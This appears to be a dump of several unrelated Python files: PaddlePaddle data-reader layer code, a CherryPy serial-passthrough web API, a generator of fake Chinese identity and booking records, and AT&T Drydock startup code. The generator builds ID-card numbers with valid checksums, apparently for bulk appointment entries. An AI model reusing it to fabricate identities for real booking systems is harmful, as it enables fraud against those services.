self.parent_block() parent_block.append_op( type='listen_and_serv', inputs={"X": self.inputs}, outputs={}, attrs={ 'endpoint': self.endpoint, 'Fanin': self.fan_in, 'optimize_blocks': [ current_block ], # did not support multiple optimize blocks in layers 'sync_mode': True, # did not support async now in layers 'grad_to_block_id': [""] }) def Send(endpoints, send_vars, dummy_output=None, sync=True): """ Send variables to the server side, and get vars from server side when server have finished running server side program. Args: endpoints (str): comma seperated IP:PORT pairs in the order of send_vars to send send_vars (list): variables to send to server sync (bool): whether to wait the request finish """ assert (type(send_vars) == list) if dummy_output is None: dummy_output = [] elif isinstance(dummy_output, Variable): dummy_output = [dummy_output] assert (type(dummy_output) == list) epmap = endpoints.split(",") endpoints = list(set(epmap)) helper = LayerHelper("Send", **locals()) rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName() helper.append_op( type="send", inputs={"X": send_vars}, outputs={"Out": dummy_output}, attrs={ "endpoints": endpoints, "epmap": epmap, rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC }) if sync: helper.append_op( type="send_barrier", inputs={"X": dummy_output}, outputs={"Out": []}, attrs={"endpoints": endpoints}) def Recv(endpoints, get_vars, dummy_input=None, sync=True): """ Receive variables from server side Args: endpoints (str): comma seperated IP:PORT pairs in the order of send_vars to send get_vars (list): vars to get from server after send completes. sync (bool): whether to wait the request finish Returns: list: list of received variables """ assert (type(get_vars) == list) if dummy_input is None: dummy_input = [] elif isinstance(dummy_input, Variable): dummy_input = [dummy_input] assert (type(dummy_input) == list) epmap = endpoints.split(",") endpoints = list(set(epmap)) helper = LayerHelper("Recv", **locals()) helper.append_op( type="recv", inputs={"X": dummy_input}, outputs={"Out": get_vars}, attrs={"endpoints": endpoints, "epmap": epmap}) if sync: helper.append_op( type="fetch_barrier", outputs={"Out": get_vars}, attrs={"endpoints": endpoints}) return get_vars def monkey_patch_reader_methods(reader): def __get_reader__(): scope = global_scope() var = scope.find_var(reader.name) return var.get_reader() def reset(): return __get_reader__().reset() reader.reset = reset reader.stop_gradient = True reader.persistable = True return reader def _copy_reader_var_(block, var): new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER) new_var.desc.set_shapes(var.desc.shapes()) new_var.desc.set_dtypes(var.desc.dtypes()) new_var.desc.set_lod_levels(var.desc.lod_levels()) new_var.persistable = True return new_var def _copy_reader_create_op_(block, op): input_param_names = op.input_names new_input_map = {} for param_name in input_param_names: new_input_map[param_name] = [] arg_names = op.input(param_name) for arg_name in arg_names: new_input_map[param_name].append(block.var(arg_name)) output_param_names = op.output_names new_output_map = {} for param_name in output_param_names: new_output_map[param_name] = [] arg_names = op.output(param_name) for arg_name in arg_names: new_output_map[param_name].append(block.var(arg_name)) new_op = block.append_op( type=op.type, inputs=new_input_map, outputs=new_output_map, attrs=op.all_attrs()) return new_op def _py_reader(capacity, shapes, dtypes, lod_levels=None, name=None, use_double_buffer=True, feed_list=None): if feed_list is not None: if not isinstance(feed_list, list): raise TypeError("feed_list should be a list of Variable" " instead of " + str(type(feed_list))) lod_levels = [] dtypes = [] shape_concat = [] ranks = [] shapes = [] need_check_feed = [] for feed_data in feed_list: dtypes.append(feed_data.dtype) shape_concat.extend(feed_data.shape) ranks.append(len(feed_data.shape)) shapes.append(feed_data.shape) lod_levels.append(feed_data.lod_level) need_check_feed.append(int(feed_data.desc.need_check_feed())) else: dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes] need_check_feed = [0 for dt in dtypes] shape_concat = [] ranks = [] for shape in shapes: shape_concat.extend(shape) ranks.append(len(shape)) if lod_levels is None: lod_levels = [0] * len(shapes) dtype_int = [int(t) for t in dtypes] if name is None: queue_name = unique_name('lod_tensor_blocking_queue') reader_name = unique_name('create_py_reader') double_buffer_name = unique_name('double_buffer') else: queue_name = "_".join([name, "queue"]) reader_name = "_".join([name, "reader"]) double_buffer_name = "_".join([name, "double_buffer"]) var = global_scope().var(queue_name) feed_queue = core.init_lod_tensor_blocking_queue(var, capacity) startup_blk = default_startup_program().current_block() startup_var = startup_blk.create_var(name=reader_name) startup_blk.append_op( type='create_py_reader', inputs={'blocking_queue': [queue_name]}, outputs={'Out': [startup_var]}, attrs={ 'shape_concat': shape_concat, 'lod_levels': lod_levels, 'dtypes': dtype_int, 'need_check_feed': need_check_feed, 'ranks': ranks }) startup_var.desc.set_dtypes(dtypes) startup_var.persistable = True main_prog_var = _copy_reader_var_(default_main_program().current_block(), startup_var) reader = monkey_patch_reader_methods(main_prog_var) if use_double_buffer: double_buffer_reader = double_buffer(reader, name=double_buffer_name) # we return a double buffer reader. However, the reset method comes from # py_reader. double_buffer_reader.reset = reader.reset reader = double_buffer_reader # monkey patch py_reader special methods reader.queue = feed_queue current_reset_method = reader.reset reader.thread = None reader.tensor_provider = None reader.exited = False def start_provide_thread(func): def __provider_thread__(): try: for tensors in func(): array = core.LoDTensorArray() for item in tensors: if not isinstance(item, core.LoDTensor): tmp = core.LoDTensor() tmp.set(item, core.CPUPlace()) item = tmp array.append(item) if reader.exited: break feed_queue.push(array) if reader.exited: break feed_queue.close() except Exception as ex: feed_queue.kill() logging.warn('Your decorated reader has raised an exception!') six.reraise(*sys.exc_info()) reader.thread = threading.Thread(target=__provider_thread__) reader.thread.daemon = True reader.thread.start() def __set_tensor_provider__(func): reader.tensor_provider = func def __set_paddle_reader__(paddle_reader): with program_guard(Program(), Program()): actual_feed_list = feed_list if actual_feed_list is None: actual_feed_list = [] counter = 0 for dtype, shape, lod_level in zip(dtypes, shapes, lod_levels): name = str(counter) actual_feed_list.append( data( name=name, dtype=dtype, shape=shape, lod_level=lod_level)) counter += 1 data_names = [feed_data.name for feed_data in actual_feed_list] feeder = DataFeeder( feed_list=actual_feed_list, place=core.CPUPlace()) paddle_reader = feeder.decorate_reader( paddle_reader, multi_devices=False) def __tensor_provider__(): for slots in paddle_reader(): yield [slots[data_name] for data_name in data_names] __set_tensor_provider__(__tensor_provider__) def __reset__(): current_reset_method() if reader.thread is not None and reader.tensor_provider is not None: reader.exited = True reader.thread.join() reader.exited = False def __start__(): start_provide_thread(reader.tensor_provider) reader.reset = __reset__ reader.decorate_tensor_provider = __set_tensor_provider__ reader.decorate_paddle_reader = __set_paddle_reader__ reader.decorate_batch_generator = __set_tensor_provider__ reader.decorate_sample_list_generator = __set_paddle_reader__ reader.start = __start__ return reader def py_reader(capacity, shapes, dtypes, lod_levels=None, name=None, use_double_buffer=True): """ Create a Python reader for data feeding in Python This operator returns a Reader Variable. The Reader provides :code:`decorate_paddle_reader()` and :code:`decorate_tensor_provider()` to set a Python generator as the data source and feed the data from the data source to the Reader Variable. When :code:`Executor::Run()` is invoked in C++ side, the data from the generator would be read automatically. Unlike :code:`DataFeeder.feed()`, the data reading process and :code:`Executor::Run()` process can run in parallel using :code:`py_reader`. The :code:`start()` method of the Reader should be called when each pass begins, while the :code:`reset()` method should be called when the pass ends and :code:`fluid.core.EOFException` raises. Note: :code:`Program.clone()` method cannot clone :code:`py_reader`. You can refer to :ref:`api_fluid_Program` for more details. The :code:`read_file` call needs to be in the program block of :code:`py_reader`. You can refer to :ref:`api_fluid_layers_read_file` for more details. Args: capacity(int): The buffer capacity maintained by :code:`py_reader`. shapes(list|tuple): List of tuples which declaring data shapes. shapes[i] represents the i-th data shape. dtypes(list|tuple): List of strings which declaring data type. Supported dtype: bool, float16, float32, float64, int8, int16, int32, int64, uint8. lod_levels(list|tuple): List of ints which declaring data lod_level. name(basestring): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. use_double_buffer(bool): Whether use double buffer or not. The double buffer is for pre-reading the data of the next batch and copy the data asynchronously from CPU to GPU. Default is True. Returns: A Reader from which we can get feeding data. Return Type: Variable Examples: 1. The basic usage of :code:`py_reader` is as follows: .. code-block:: python import paddle import paddle.fluid as fluid import paddle.dataset.mnist as mnist def network(image, label): # user defined network, here a softmax regresssion example predict = fluid.layers.fc(input=image, size=10, act='softmax') return fluid.layers.cross_entropy(input=predict, label=label) reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64']) reader.decorate_paddle_reader( paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=1000)) img, label = fluid.layers.read_file(reader) loss = network(img, label) fluid.Executor(fluid.CUDAPlace(0)).run(fluid.default_startup_program()) exe = fluid.ParallelExecutor(use_cuda=True) for epoch_id in range(10): reader.start() try: while True: exe.run(fetch_list=[loss.name]) except fluid.core.EOFException: reader.reset() fluid.io.save_inference_model(dirname='./model', feeded_var_names=[img.name, label.name], target_vars=[loss], executor=fluid.Executor(fluid.CUDAPlace(0))) 2. When training and testing are both performed, two different :code:`py_reader` should be created with different names, e.g.: .. code-block:: python import paddle import paddle.fluid as fluid import paddle.dataset.mnist as mnist def network(reader): img, label = fluid.layers.read_file(reader) # User defined network. Here a simple regression as example predict = fluid.layers.fc(input=img, size=10, act='softmax') loss = fluid.layers.cross_entropy(input=predict, label=label) return fluid.layers.mean(loss) # Create train_main_prog and train_startup_prog train_main_prog = fluid.Program() train_startup_prog = fluid.Program() with fluid.program_guard(train_main_prog, train_startup_prog): # Use fluid.unique_name.guard() to share parameters with test program with fluid.unique_name.guard(): train_reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64'], name='train_reader') train_reader.decorate_paddle_reader( paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=500)) train_loss = network(train_reader) # some network definition adam = fluid.optimizer.Adam(learning_rate=0.01) adam.minimize(train_loss) # Create test_main_prog and test_startup_prog test_main_prog = fluid.Program() test_startup_prog = fluid.Program() with fluid.program_guard(test_main_prog, test_startup_prog): # Use fluid.unique_name.guard() to share parameters with train program with fluid.unique_name.guard(): test_reader = fluid.layers.py_reader(capacity=32, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64'], name='test_reader') test_reader.decorate_paddle_reader(paddle.batch(mnist.test(), 512)) test_loss = network(test_reader) fluid.Executor(fluid.CUDAPlace(0)).run(train_startup_prog) fluid.Executor(fluid.CUDAPlace(0)).run(test_startup_prog) train_exe = fluid.ParallelExecutor(use_cuda=True, loss_name=train_loss.name, main_program=train_main_prog) test_exe = fluid.ParallelExecutor(use_cuda=True, loss_name=test_loss.name, main_program=test_main_prog) for epoch_id in range(10): train_reader.start() try: while True: train_exe.run(fetch_list=[train_loss.name]) except fluid.core.EOFException: train_reader.reset() test_reader.start() try: while True: test_exe.run(fetch_list=[test_loss.name]) except fluid.core.EOFException: test_reader.reset() """ logging.warn( 'paddle.fluid.layers.py_reader() may be deprecated in the near future. ' 'Please use paddle.fluid.io.DataLoader.from_generator() instead.') return _py_reader( capacity=capacity, shapes=shapes, dtypes=dtypes, lod_levels=lod_levels, name=name, use_double_buffer=use_double_buffer) def create_py_reader_by_data(capacity, feed_list, name=None, use_double_buffer=True): """ The OP creates a Python reader for data feeding in Python, it is similar to :ref:`api_fluid_layers_py_reader` except that it can read data from the list of feed variables. Parameters: capacity (int): The buffer capacity maintained by :code:`py_reader`. Its unit is batch number. Set larger :attr:`capacity` if the reader is fast. feed_list (list(Variable)): The feed variables, are usually created by :code:`fluid.data()`. name (str, optional): Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default: None. use_double_buffer (bool, optional): Whether use double buffer. If it's True, the OP would prefetch next batch data asynchronously. Default: True. Returns: Reader: A Reader for data feeding. The data types of read data are the same as the data types of variables of :attr:`feed_list`. Examples: .. code-block:: python import paddle import paddle.fluid as fluid import paddle.dataset.mnist as mnist def network(img, label): # User defined network. Here a simple regression as example predict = fluid.layers.fc(input=img, size=10, act='softmax') loss = fluid.layers.cross_entropy(input=predict, label=label) return fluid.layers.mean(loss) MEMORY_OPT = False USE_CUDA = False image = fluid.data(name='image', shape=[None, 1, 28, 28], dtype='float32') label = fluid.data(name='label', shape=[None, 1], dtype='int64') reader = fluid.layers.create_py_reader_by_data(capacity=64, feed_list=[image, label]) reader.decorate_paddle_reader( paddle.reader.shuffle(paddle.batch(mnist.train(), batch_size=5), buf_size=500)) img, label = fluid.layers.read_file(reader) loss = network(img, label) # The definition of custom network and the loss funtion place = fluid.CUDAPlace(0) if USE_CUDA else fluid.CPUPlace() exe = fluid.Executor(place) exe.run(fluid.default_startup_program()) build_strategy = fluid.BuildStrategy() build_strategy.memory_optimize = True if MEMORY_OPT else False exec_strategy = fluid.ExecutionStrategy() compiled_prog = fluid.compiler.CompiledProgram( fluid.default_main_program()).with_data_parallel( loss_name=loss.name, build_strategy=build_strategy, exec_strategy=exec_strategy) for epoch_id in range(2): reader.start() try: while True: exe.run(compiled_prog, fetch_list=[loss.name]) except fluid.core.EOFException: reader.reset() """ logging.warn( 'paddle.fluid.layers.create_py_reader_by_data() may be deprecated in the near future. ' 'Please use paddle.fluid.io.DataLoader.from_generator() instead.') return _py_reader( capacity=capacity, shapes=None, dtypes=None, lod_levels=None, name=name, use_double_buffer=use_double_buffer, feed_list=feed_list) def __create_shared_decorated_reader__(op_type, reader, attrs): var_name = unique_name(op_type) startup_blk = default_startup_program().current_block() startup_var = startup_blk.create_var(name=var_name) startop_op = startup_blk.append_op( type=op_type, inputs={'UnderlyingReader': reader}, outputs={'Out': [startup_var]}, attrs=attrs) startup_var.persistable = True main_prog_block = default_main_program().current_block() main_prog_var = _copy_reader_var_(main_prog_block, startup_var) _copy_reader_create_op_(main_prog_block, startop_op) return monkey_patch_reader_methods(main_prog_var) def __create_unshared_decorated_reader__(op_type, reader, attrs, name=None): new_reader_name = name if name is not None else unique_name(op_type) main_blk = default_main_program().current_block() new_reader = main_blk.create_var(name=new_reader_name) main_blk.append_op( type=op_type, inputs={'UnderlyingReader': reader}, outputs={'Out': [new_reader]}, attrs=attrs) return monkey_patch_reader_methods(new_reader) def double_buffer(reader, place=None, name=None): """ Wrap a double buffer reader. The class Reader contains DecoratedReader and FileReader. Moreover, the DecoratedReader is inherited by CustomReader and BufferedReader. This function is related to BufferedReader. The data will copy to target place with a double buffer queue. If the target place is None, the place that executor perform on will be used. Args: reader (Variable): The Reader Variable need to be wrapped. place (Place, optional): The place of target data, such as CPU, GPU, and if use GPU, it's necessary to point out which card is involved. Default is the sample place of executor perform. name (str, optional): Variable name. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`. Default is None. Returns: Variable(Reader): wrapped reader with double buffer. Examples: .. code-block:: python import paddle.fluid as fluid reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64'], use_double_buffer=False) reader = fluid.layers.double_buffer(reader) image, label = fluid.layers.read_file(reader) """ attrs = dict() if place is not None: attrs['place'] = str(place).upper() return __create_unshared_decorated_reader__( 'create_double_buffer_reader', reader, attrs, name=name) def read_file(reader): """ Execute the given reader and get data via it. A reader is also a Variable. It can be a raw reader generated by `fluid.layers.open_files()` or a decorated one generated by `fluid.layers.double_buffer()` . Args: reader(Variable): The reader to execute. Returns: Tuple[Variable]: Data read from the given reader. Examples: .. code-block:: python import paddle.fluid as fluid reader = fluid.layers.py_reader(capacity=64, shapes=[(-1, 1, 28, 28), (-1, 1)], dtypes=['float32', 'int64']) image, label = fluid.layers.read_file(reader) """ helper = LayerHelper('read_file') out = [ helper.create_variable_for_type_inference( stop_gradient=True, dtype='float32') for _ in range(len(reader.desc.shapes())) ] helper.append_op( type='read', inputs={'Reader': [reader]}, outputs={'Out': out}) if len(out) == 1: return out[0] else: return out def load(out, file_path, load_as_fp16=None): """ Load operator will load a LoDTensor / SelectedRows variable from disk file. Args: out(Variable): The LoDTensor / SelectedRows need to be loaded.. file_path(STRING): Variable will be loaded from "file_path". load_as_fp16(BOOLEAN): If true, the tensor will be first loaded and then converted to float16 data type. Otherwise, the tensor will be directly loaded without data type conversion. Default is false.. Returns: None Examples: .. code-block:: python import paddle.fluid as fluid tmp_tensor = fluid.layers.create_tensor(dtype='float32') fluid.layers.load(tmp_tensor, "./tmp_tensor.bin") """ helper = LayerHelper("load", **locals()) attrs = {"file_path": file_path} if load_as_fp16 is not None: attrs['load_as_fp16'] = load_as_fp16 helper.append_op(type="load", inputs={}, output={"Out": out}, attrs=attrs)
main.py
#NAME: main.py #DATE: Wednesday 5th August 2019 #AUTH: Ryan McCartney, EEE Undergraduate, Queen's University Belfast #DESC: A python script for running a cherrpi API as a serial passthrough #COPY: Copyright 2018, All Rights Reserved, Ryan McCartney import threading import cherrypy import serial import time import json import os cofigFilePath = "api/settings.json" #define threading wrapper def threaded(fn): def wrapper(*args, **kwargs): thread = threading.Thread(target=fn, args=args, kwargs=kwargs) thread.start() return thread return wrapper try: class API(object): def __init__(self,cofigFilePath): self.loadConfig(cofigFilePath) #Initiialise other Variables self.connected = False self.serialMonitorData = ["-,-"]*self.serialMonitorLines self.latestMessage = "" self.previousMessage = "" self.indexPrepared = False #Update Server Port cherrypy.config.update( {'server.socket_host': '0.0.0.0', 'server.socket_port': self.serverPort} ) #On startup try to connect to serial self.connect() self.startXboxControl() def loadConfig(self,configFilePath): with open(configFilePath) as configFile: config = json.load(configFile) self.serverName = config["serverName"] self.serverPort = config["serverPort"] self.serialPort = config["serialPort"] self.baudrate = config["baudrate"] self.serialMonitorLines = config["serialMonitorLines"] self.hostname = config["hostname"] @cherrypy.expose def index(self): if not self.indexPrepared: self.prepareIndex() #On index try to connect to serial self.connect() with open ("api/index.html", "r") as webPage: contents=webPage.readlines() return contents def prepareIndex(self): contents = "" with open("api/baseIndex.html", "rt") as webPageIn: for line in webPageIn: contents += line.replace('SERVERNAMEFEILD',self.serverName) with open("api/index.html", "wt") as webPageOut: webPageOut.write(contents) self.indexPrepared = True @cherrypy.expose def startXboxControl(self): try: status = "Xbox Controller succesfully connected." except: status = "Xbox Controller coulf not be connected." return status @cherrypy.expose def joystick(self): self.disconnect() self.connect() with open ("api/joystick.html", "r") as webPage: contents=webPage.readlines() return contents @cherrypy.expose def clearLogs(self): currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") #Clear Transmit Log log = open("api/public/transmitLog.csv","w") log.write("Date and Time,Command String Passed\n") log.close() #Clear Receive Log log = open("api/public/receiveLog.csv","w") log.write("Date and Time,"+self.serverName+" Response\n") log.close() #Clear serial monitor self.serialMonitorData = ["-,-"]*self.serialMonitorLines #Return Message status = currentDateTime + " - INFO: Transmit and Receive Logs have been cleared." print(status) return status @cherrypy.expose def send(self,command="this"): #Get Current Date and Time for Logging currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") if(self.connected == False): status = self.connect() try: #Add command to transmit log with open ("api/public/transmitLog.csv", "a+") as log: log.write(currentDateTime+","+command+"\n") #Write Command Passed to Serial Port payload = (command+'\n').encode('ascii') self.serial.write(payload) time.sleep(0.008) status = currentDateTime + " - INFO: '" + command + "' sent succesfully." except: status = currentDateTime + " - ERROR: Could not send '"+ command +"' to serial port. Check connection." self.connected = False print(status) return status @threaded def receive(self): #Initialise array to store data serial monitor data self.serialMonitorData = ["-,-"]*self.serialMonitorLines while self.connected == True: #Get Current Date and Time for Logging currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") #Read Response if Avalible response = "VOID" try: if self.serial.in_waiting > 0: response = self.serial.readline().decode('utf-8') response = response.strip() logLine = currentDateTime+","+str(response) self.latestMessage = response #Add response to receive log with open ("api/public/receiveLog.csv", "a+") as log: log.write(logLine+"\n") #Add received data to serial monitor array self.serialMonitorData.pop(0) self.serialMonitorData.append(logLine) #print(logLine) if self.serial.in_waiting > 200: self.serial.reset_input_buffer() dump = self.serial.readline().decode('utf-8') currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") status = currentDateTime + " - ERROR: Buffer full dumping '"+str(dump)+"'." print(status) except: self.connected = False currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") status = currentDateTime + " - ERROR: Cannot read serial line." print(status) @cherrypy.expose def serialMonitor(self): headers = ["Timestamp","Data 1","Data 2","Data 3","Data 4"] #Add Correct number of Headers table = "<table><tr>" for header in headers: table += "<th>"+header+"</th>" table += "</tr>" #Get table contents rows = len(self.serialMonitorData)-1 for i in range(rows,0,-1): row = self.serialMonitorData[i] table += "<tr><td width='20%'>" table += row.replace(",", "</td><td width='15%'>",len(headers)) if row.count(',') < len(headers): for i in range(row.count(','),len(headers)-1): table += "</td><td width='15%'>" table += "</td></tr>" table +="</table>" return table @cherrypy.expose def getLast(self): return self.latestMessage @cherrypy.expose def getLatest(self): if self.previousMessage == self.latestMessage: message = "" else: message = self.latestMessage self.previousMessage = self.latestMessage return message @cherrypy.expose def connect(self): currentDateTime = time.strftime("%d/%m/%Y %H:%M:%S") status = currentDateTime + " - INFO: Motor control box arduino already connected." if(self.connected == False): try: self.disconnect() #Open Serial Connection self.serial = serial.Serial( port= self.serialPort, baudrate=self.baudrate, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, bytesize=serial.EIGHTBITS, ) time.sleep(1) self.connected = True self.receive() status = "INFO: "+self.serverName+" connected to "+self.serial.name+"." except: status = "ERROR: Could not establish a connection with "+self.serverName+"." print(status) return status @cherrypy.expose def disconnect(self): try: self.serial.close() self.connected = False status = "INFO: "+self.serverName+" disconnected." except: status = "INFO: "+self.serverName+" is not connected." print(status) return status @cherrypy.expose def getImage(self): image = "NOT YET OPERATIONAL" return image if __name__ == '__main__': cherrypy.config.update( {'server.socket_host': '0.0.0.0', 'server.socket_port': 8080} ) cherrypy.quickstart(API(cofigFilePath), '/', { 'favicon.ico': { 'tools.staticfile.on': True, 'tools.staticfile.filename': os.path.join(os.getcwd(),'api/public/favicon.ico') }, '/public': { 'tools.staticdir.on' : True, 'tools.staticdir.dir' : os.path.join(os.getcwd(),'api/public'), 'tools.staticdir.index' : 'index.html', 'tools.gzip.on' : True } } ) except: print("ERROR: Main sequence error.")
peopleinfolist.py
# !/user/bin/python # -*- coding:utf-8 -*- import random,threading class peopleinfolist(): def __init__(self, num): self.num = num self.pl = [] self.idl = [] self.namel = [] self.phonel = [] self.peoil = [] #创建多线程,完成身份证、手机号、姓名、预约门店信息的随机生成且不重复 tid = threading.Thread(target=self._getid, args=()) tname = threading.Thread(target=self._getname, args=()) tshop = threading.Thread(target=self._getshop, args=()) tphone = threading.Thread(target=self._getphone, args=()) tid.start() tname.start() tshop.start() tphone.start() tid.join() tname.join() tshop.join() tphone.join() self._makepeopleinfolist() def _getid(self): ''' 生成随机身份证号码,不考虑不同月份天数不同的影响; 只随机日期在28以内的 ''' placenums = ['130102','130104','130105','130107','130108','130109','130110'] weight = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2] cheack_code = {'0': '1','1': '0','2': 'X','3': '9','4': '8','5': '7','6': '6','7': '5','8': '4','9': '3','10': '2'} ids = set() while len(ids) < self.num: placenum = random.choice(placenums) year = str(random.randint(1963,2011)) m = random.randint(1,12) month = str(m) if m > 9 else ('0' + str(m)) d = random.randint(1,28) day = str(d) if d > 9 else ('0' + str(d)) date = year + month + day ID_former = placenum + date + str(random.randint(100,999)) sum = 0 for i, num in enumerate(ID_former): sum += int(num) * weight[i] ID_check = cheack_code[str(sum % 11)] ids.add(ID_former + ID_check) self.idl = list(ids) def _getname(self): #随机生成人员姓名 firstnames = [ '张','白','林','杨','刘','梁','苏','石','赛','尚','丁','董','王', '戴','段','方','范','冯','高','郭','许','徐','聂','黄','赵','周', '章','陈','曾','牛','朱','钟','韩','包','吕','展','魏','金','童', '顾','孙','郑','胡','邓','左','靳','闻','葛','司','田','吴','马', '卞','崔','甄','曹','杜','郝','吕','毛','任','潘','谢','姜','武', '袁','尹','于','何','叶','薛','要','宁','耿','司马','上官','欧阳', '次','冉','艾','诸葛','孔','夏','沙','齐','江','贾','连','秦', '侯','孟','卢','贾','邵','蔡','程','万','姚','罗','韦','唐','朗', '贺','沈','汤','佟','慕','闫','谭','陆','艾','祁','丰','古','娄', '洪','侯' ] lastnames = [ '水','静','敏','聪','辉','慧','淼','永','国','刚','强','风','花', '雪','月','涛','海','萍','晶','丽','利','峰','明','星','兴','乐', '龙','旺','易','婉','楠','笑','霞','光','彩','才','益','帅','琳', '晓','雅','俊','军','赫','凯','耀','杰','芳','航','达','垣','屹', '珊','姗','彬','斌','益','秀','玲','松','铭','洲','亚','叶','文', '娟','玉','婷','博','礼','莉','莹','梦','英','雄','珑','烟','泰', '晨','光','志','智','珉','烨','贤','阳','洋','安','康','翔','丰', '飞','伟','威','薇','娜','冰','霜','浅','清','琴','勤','亮','晴', '青','庆','柳','秋','语','荣','智','志','念','缘','羽','柔','婕', '杉','缤','梅','彤','盛','硕','琼','宁','豪','华','欣','坤','璐', '襄','超','川','宇','柏','贝','慈','睿','瑞','祥','树','兰','岚', '旭','芝','诺','佳','嘉','雨','天','娟','鸿','璐','航','澜','忠', '富','福','悦','越','超','艺','栋','毅','冰','歌','芬','芳','浩', '腾','鑫','蕾','雷','帆','鹏','雷','烟','桃','舟','茜','策','露', '欢','心','一','初','涵','然','璇','颖','腾','蓬','娥','琪','琦', '新','淑','军','君','娇','莎','倩','窈','窕','茗','恒','萱','珍', '昭','朝','宝','萌','楚','瑛','滢','菲','翠','远','云','韵','运', '浮','笙','苼','仙','世','和','碧','靖','菁','宗','剑','河','谨', '义','彦','家','佳','辰','舒','香','茹','柯','德','燕','影','敬', '景','雯','磊','','','','','','','','','','','','','','','','', '','','','','','','','','','','','','','','','','','','','','' ] names = set() while len(names) < self.num: name = random.choice(firstnames) + random.choice(lastnames) + random.choice(lastnames) if len(name) > 1: names.add(name) self.namel = list(names) def _getphone(self): #生成手机号 phsegment = [ '136','139','151','133','156','155','130','177','173','172','188','178','132', '180','150','189','185','186','137','159','131' ] phones = set() while len(phones) < self.num: phone = str(random.choice(phsegment)) + str(random.randint(32567112,99998698)) phones.add(phone) self.phonel = list(phones) def _getshop(self): ''' 随机生成门店及区域信息,信息不全 ''' shops = [ {"shopid":"15","areaid":"3"},{"shopid":"18","areaid":"15"},{"shopid":"20","areaid":"15"}, {"shopid":"23","areaid":"15"},{"shopid":"36","areaid":"15"},{"shopid":"37","areaid":"15"}, {"shopid":"38","areaid":"15"},{"shopid":"50","areaid":"15"},{"shopid":"60","areaid":"15"} ] num = self.num while num: num -= 1 self.pl.append(random.choice(shops)) def _makepeopleinfolist(self): ''' 使用所生成的随机数据创建人员信息列表 ''' for index, item in enumerate(self.pl): item['phone'] = self.phonel[index] item['name'] = self.namel[index] item['id'] = self.idl[index] item['yzm'] = '' self.peoil.append(item.copy()) def getpl(self): return self.peoil
drydock.py
# Copyright 2017 AT&T Intellectual Property. All other rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import logging import sys import os import threading from oslo_config import cfg from drydock_provisioner import policy from drydock_provisioner.statemgmt.state import DrydockState from drydock_provisioner.ingester.ingester import Ingester from drydock_provisioner.orchestrator.orchestrator import Orchestrator import drydock_provisioner.config as config import drydock_provisioner.objects as objects import drydock_provisioner.control.api as api def start_drydock(enable_keystone=True): objects.register_all() # Setup configuration parsing cli_options = [ cfg.BoolOpt( 'debug', short='d', default=False, help='Enable debug logging'), ] config.config_mgr.conf.register_cli_opts(cli_options) config.config_mgr.register_options(enable_keystone=enable_keystone) config.config_mgr.conf(sys.argv[1:]) if config.config_mgr.conf.debug: config.config_mgr.conf.set_override( name='log_level', override='DEBUG', group='logging') # Setup root logger logger = logging.getLogger( config.config_mgr.conf.logging.global_logger_name) logger.setLevel(config.config_mgr.conf.logging.log_level) ch = logging.StreamHandler() formatter = logging.Formatter( '%(asctime)s - %(levelname)s - %(filename)s:%(funcName)s - %(message)s' ) ch.setFormatter(formatter) logger.addHandler(ch) # Specalized format for API logging logger = logging.getLogger( config.config_mgr.conf.logging.control_logger_name) logger.propagate = False formatter = logging.Formatter( '%(asctime)s - %(levelname)s - %(user)s - %(req_id)s - %(external_ctx)s - %(message)s' ) ch = logging.StreamHandler() ch.setFormatter(formatter) logger.addHandler(ch) state = DrydockState() state.connect_db() input_ingester = Ingester() input_ingester.enable_plugin(config.config_mgr.conf.plugins.ingester) orchestrator = Orchestrator( enabled_drivers=config.config_mgr.conf.plugins, state_manager=state, ingester=input_ingester) orch_thread = threading.Thread(target=orchestrator.watch_for_tasks) orch_thread.start() # Check if we have an API key in the environment # Hack around until we move MaaS configs to the YAML schema if 'MAAS_API_KEY' in os.environ: config.config_mgr.conf.set_override( name='maas_api_key', override=os.environ['MAAS_API_KEY'], group='maasdriver') # Setup the RBAC policy enforcer policy.policy_engine = policy.DrydockPolicy() policy.policy_engine.register_policy() # Ensure that the policy_engine is initialized before starting the API wsgi_callable = api.start_api( state_manager=state, ingester=input_ingester, orchestrator=orchestrator) # Now that loggers are configured, log the effective config config.config_mgr.conf.log_opt_values( logging.getLogger(config.config_mgr.conf.logging.global_logger_name), logging.DEBUG) return wsgi_callable # Initialization compatible with PasteDeploy def paste_start_drydock(global_conf, disable=None): enable_keystone = True if disable is not None: for d in disable.split(): if d == 'keystone': enable_keystone = False return start_drydock(enable_keystone=enable_keystone)
generate_subject_webpages.py
